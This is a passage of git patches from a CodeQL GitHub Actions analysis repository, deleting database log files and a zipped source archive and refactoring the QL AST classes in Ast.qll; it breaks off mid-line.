Plumbing command codeql dataset cleanup completed. -[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. -[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). -[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. -[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log deleted file mode 100644 index e204c6df37d..00000000000 --- a/db/log/database-index-files-20240301.130558.974.log +++ /dev/null @@ -1,44 +0,0 @@ -[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Log file was started late. -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... -[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... -[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", - "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" - ] -[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. -[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. -[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Terminating normally. diff --git a/db/src.zip b/db/src.zip deleted file mode 100644 index 3006b787babfbfd5da405e1a7f5736ea762e4abe..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20479 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 From e5527d7a181a0c37cd6fa3d8fd885f3ee1e3092b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 5 Mar 2024 19:59:43 +0100 Subject: [PATCH 0086/1267] Refactor ast nodes --- ql/lib/codeql/actions/Ast.qll | 281 ++++++++++++++++++++++------------ 1 file changed, 184 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 89afd954d85..1d86d81a063 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,19 +1,51 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +newtype TAstNode = + TWorflowNode(YamlNode n) or + TExpressionNode() + +class AstNode extends TAstNode { + abstract AstNode getAChildNode(); + + abstract AstNode getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract string toString(); +} + +class ExpressionNode extends AstNode, TExpressionNode { + override string toString() { result = "expression node" } + + override AstNode getAChildNode() { none() } + + override AstNode getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override Location getLocation() { none() } +} + /** * Base class for the AST tree. Based on YamlNode from the Yaml library. */ -class AstNode instanceof YamlNode { - AstNode getParentNode() { result = super.getParentNode() } +class WorkflowNode extends AstNode, TWorflowNode { + YamlNode n; - AstNode getAChildNode() { result = super.getAChildNode() } + WorkflowNode() { this = TWorflowNode(n) } - string toString() { result = super.toString() } + override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } - Location getLocation() { result = super.getLocation() } + override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } + + override Location getLocation() { result = n.getLocation() } + + override string toString() { result = n.toString() } /** * Gets the enclosing workflow statement. @@ -24,7 +56,9 @@ class AstNode instanceof YamlNode { * Gets a environment variable expression by name in the scope of the current node. */ StringLiteral getEnvVar(string name) { - exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + exists(Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) + | env.(StepEnv).getStep().getAChildNode*() = this or env.(JobEnv).getJob().getAChildNode*() = this @@ -32,16 +66,23 @@ class AstNode instanceof YamlNode { env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } + + YamlNode asYamlNode() { result = n } + + YamlMapping asYamlMapping() { result = n } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends AstNode instanceof YamlMapping { } +abstract class Env extends WorkflowNode { } /** A workflow level `env` mapping. */ class WorkflowEnv extends Env { Workflow workflow; - WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + WorkflowEnv() { + n instanceof YamlMapping and + workflow.asYamlMapping().lookup("env") = this.asYamlNode() + } /** Gets the workflow this field belongs to. */ Workflow getWorkflow() { result = workflow } @@ -51,7 +92,7 @@ class WorkflowEnv extends Env { class JobEnv extends Env { Job job; - JobEnv() { job.(YamlMapping).lookup("env") = this } + JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the job this field belongs to. */ Job getJob() { result = job } @@ -61,7 +102,7 @@ class JobEnv extends Env { class StepEnv extends Env { Step step; - StepEnv() { step.(YamlMapping).lookup("env") = this } + StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the step this field belongs to. */ Step getStep() { result = step } @@ -71,27 +112,32 @@ class StepEnv extends Env { * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { - //class CompositeAction extends AstNode, YamlDocument, YamlMapping { +class CompositeAction extends WorkflowNode { + //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = 